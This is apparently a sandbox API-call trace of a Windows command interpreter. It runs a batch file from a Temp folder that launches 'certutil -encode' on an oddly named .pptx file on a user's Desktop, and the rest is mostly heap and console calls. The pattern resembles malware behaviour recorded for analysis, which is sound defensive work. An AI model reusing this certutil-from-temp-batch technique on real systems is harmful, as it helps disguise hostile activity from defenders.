[0285.811] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0285.811] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0285.812] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0285.812] GetProcessHeap () returned 0x21ed8c70000 [0285.812] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bc0) returned 1 [0285.812] GetProcessHeap () returned 0x21ed8c70000 [0285.812] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95800 [0285.812] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0285.812] _get_osfhandle (_FileHandle=1) returned 0x50 [0285.813] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0285.892] _get_osfhandle (_FileHandle=0) returned 0x4c [0285.892] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0285.972] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x1150, dwThreadId=0x1244)) returned 1 [0286.632] CloseHandle (hObject=0xa4) returned 1 [0286.632] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0286.633] GetProcessHeap () returned 0x21ed8c70000 [0286.633] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d160) returned 1 [0286.633] GetEnvironmentStringsW () returned 0x21ed937d160* [0286.633] GetProcessHeap () returned 0x21ed8c70000 [0286.633] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937dcb0 [0286.633] FreeEnvironmentStringsA (penv="=") returned 1 [0286.633] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0288.483] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0288.484] CloseHandle (hObject=0xa8) returned 1 [0288.484] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0288.484] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0288.484] GetProcessHeap () returned 0x21ed8c70000 [0288.484] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937dcb0) returned 1 [0288.484] GetEnvironmentStringsW () returned 0x21ed937d160* [0288.484] GetProcessHeap () returned 0x21ed8c70000 [0288.484] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937dcb0 [0288.484] FreeEnvironmentStringsA (penv="=") returned 1 [0288.484] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0288.484] GetProcessHeap () returned 0x21ed8c70000 [0288.484] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937dcb0) returned 1 [0288.484] GetEnvironmentStringsW () returned 0x21ed937d160* [0288.485] GetProcessHeap () returned 0x21ed8c70000 [0288.485] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed937dcb0 [0288.485] FreeEnvironmentStringsA (penv="=") returned 1 [0288.485] GetProcessHeap () returned 0x21ed8c70000 [0288.485] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95800) returned 1 [0288.485] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0288.485] ??_V@YAXPEAX@Z () returned 0x1 [0288.485] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c02c00, ftCreationTime.dwHighDateTime=0x1d5e98a, ftLastAccessTime.dwLowDateTime=0xea1a3650, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0xea1a3650, ftLastWriteTime.dwHighDateTime=0x1d5e98b, nFileSizeHigh=0x0, nFileSizeLow=0x12338, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="_zyi016uyI EccZobgM.pptx.Sister", cAlternateFileName="")) returned 0 [0288.485] GetLastError () returned 0x12 [0288.485] FindClose (in: hFindFile=0x21ed8c7cb20 | out: hFindFile=0x21ed8c7cb20) returned 1 [0288.485] GetProcessHeap () returned 0x21ed8c70000 [0288.486] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45dd0) returned 1 [0288.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0288.486] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0288.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0288.553] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0288.631] _get_osfhandle (_FileHandle=1) returned 0x50 [0288.632] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0288.701] _get_osfhandle (_FileHandle=0) returned 0x4c [0288.702] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0288.769] _get_osfhandle (_FileHandle=0) returned 0x4c [0288.770] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0288.843] SetConsoleInputExeNameW () returned 0x1 [0288.844] GetConsoleOutputCP () returned 0x1b5 [0288.942] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0288.942] SetThreadUILanguage (LangId=0x0) returned 0x409 [0289.108] ??_V@YAXPEAX@Z () returned 0x1 [0289.109] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0289.109] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0289.109] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.109] SetFilePointer (in: hFile=0x98, lDistanceToMove=386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x182 [0289.109] GetProcessHeap () returned 0x21ed8c70000 [0289.109] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d61f10) returned 1 [0289.109] GetProcessHeap () returned 0x21ed8c70000 [0289.109] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44830) returned 1 [0289.109] GetProcessHeap () returned 0x21ed8c70000 [0289.110] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cb00) returned 1 [0289.110] GetProcessHeap () returned 0x21ed8c70000 [0289.110] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94510b0) returned 1 [0289.110] GetProcessHeap () returned 0x21ed8c70000 [0289.110] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a0db0) returned 1 [0289.110] GetProcessHeap () returned 0x21ed8c70000 [0289.110] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed94410c0) returned 1 [0289.113] GetProcessHeap () returned 0x21ed8c70000 [0289.113] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7970) returned 1 [0289.113] GetProcessHeap () returned 0x21ed8c70000 [0289.113] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cc40) returned 1 [0289.113] GetProcessHeap () returned 0x21ed8c70000 [0289.113] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a910) returned 1 [0289.114] GetProcessHeap () returned 0x21ed8c70000 [0289.114] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a8a0) returned 1 [0289.114] GetProcessHeap () returned 0x21ed8c70000 [0289.114] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d61e80) returned 1 [0289.114] GetProcessHeap () returned 0x21ed8c70000 [0289.114] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0289.114] GetProcessHeap () returned 0x21ed8c70000 [0289.114] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b370) returned 1 [0289.114] GetProcessHeap () returned 0x21ed8c70000 [0289.114] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9441050) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96280) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9431060) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7a10) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc77e0) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a660) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a5f0) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66cf0) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937ea50) returned 1 [0289.115] GetProcessHeap () returned 0x21ed8c70000 [0289.115] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b710) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9430ff0) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379300) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9421000) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d10) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8750) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a460) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a3f0) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66c60) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0300) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bc80) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9420f90) returned 1 [0289.116] GetProcessHeap () returned 0x21ed8c70000 [0289.116] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937ee90) returned 1 [0289.117] GetProcessHeap () returned 0x21ed8c70000 [0289.117] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9410fa0) returned 1 [0289.119] GetProcessHeap () returned 0x21ed8c70000 [0289.119] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8a10) returned 1 [0289.119] GetProcessHeap () returned 0x21ed8c70000 [0289.119] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7f10) returned 1 [0289.119] GetProcessHeap () returned 0x21ed8c70000 [0289.119] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a1d0) returned 1 [0289.119] GetProcessHeap () returned 0x21ed8c70000 [0289.119] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2a160) returned 1 [0289.119] GetProcessHeap () returned 0x21ed8c70000 [0289.119] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66bd0) returned 1 [0289.119] GetProcessHeap () returned 0x21ed8c70000 [0289.119] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0289.120] GetProcessHeap () returned 0x21ed8c70000 [0289.120] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b1a0) returned 1 [0289.120] GetProcessHeap () returned 0x21ed8c70000 [0289.120] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9410f30) returned 1 [0289.122] GetProcessHeap () returned 0x21ed8c70000 [0289.122] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0bc0) returned 1 [0289.122] GetProcessHeap () returned 0x21ed8c70000 [0289.122] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9400f40) returned 1 [0289.122] GetProcessHeap () returned 0x21ed8c70000 [0289.122] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8c50) returned 1 [0289.122] GetProcessHeap () returned 0x21ed8c70000 [0289.122] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7d80) returned 1 [0289.122] GetProcessHeap () returned 0x21ed8c70000 [0289.122] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d29f30) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d29ec0) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0b30) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60a40) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c1f0) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9400ed0) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96940) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93f0ee0) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7ec0) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cb80) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d29c70) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d29c00) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.123] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0aa0) returned 1 [0289.123] GetProcessHeap () returned 0x21ed8c70000 [0289.124] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44c90) returned 1 [0289.124] GetProcessHeap () returned 0x21ed8c70000 [0289.124] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cea0) returned 1 [0289.124] GetProcessHeap () returned 0x21ed8c70000 [0289.124] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93f0e70) returned 1 [0289.124] GetProcessHeap () returned 0x21ed8c70000 [0289.124] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96580) returned 1 [0289.124] GetProcessHeap () returned 0x21ed8c70000 [0289.124] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93e0e80) returned 1 [0289.127] GetProcessHeap () returned 0x21ed8c70000 [0289.127] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc79c0) returned 1 [0289.127] GetProcessHeap () returned 0x21ed8c70000 [0289.127] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ca60) returned 1 [0289.127] GetProcessHeap () returned 0x21ed8c70000 [0289.127] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d29990) returned 1 [0289.128] GetProcessHeap () returned 0x21ed8c70000 [0289.128] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d29920) returned 1 [0289.128] GetProcessHeap () returned 0x21ed8c70000 [0289.128] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc84a0) returned 1 [0289.128] GetProcessHeap () returned 0x21ed8c70000 [0289.128] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b08d0) returned 1 [0289.128] GetProcessHeap () returned 0x21ed8c70000 [0289.128] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b540) returned 1 [0289.128] GetProcessHeap () returned 0x21ed8c70000 [0289.128] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93e0e10) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d657f0) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93d0e20) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc88d0) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7e20) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6af20) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6aeb0) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8410) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0700) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c930) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93d0db0) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45a20) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93c0dc0) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.165] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8890) returned 1 [0289.165] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7ab0) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ac90) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ac20) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980ab0) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8240) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c760) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93c0d50) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96040) returned 1 [0289.166] GetProcessHeap () returned 0x21ed8c70000 [0289.166] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0d60) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7330) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cee0) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a9c0) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a950) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980a20) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8070) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c590) returned 1 [0289.170] GetProcessHeap () returned 0x21ed8c70000 [0289.170] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0cf0) returned 1 [0289.173] GetProcessHeap () returned 0x21ed8c70000 [0289.173] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96ac0) returned 1 [0289.173] GetProcessHeap () returned 0x21ed8c70000 [0289.173] 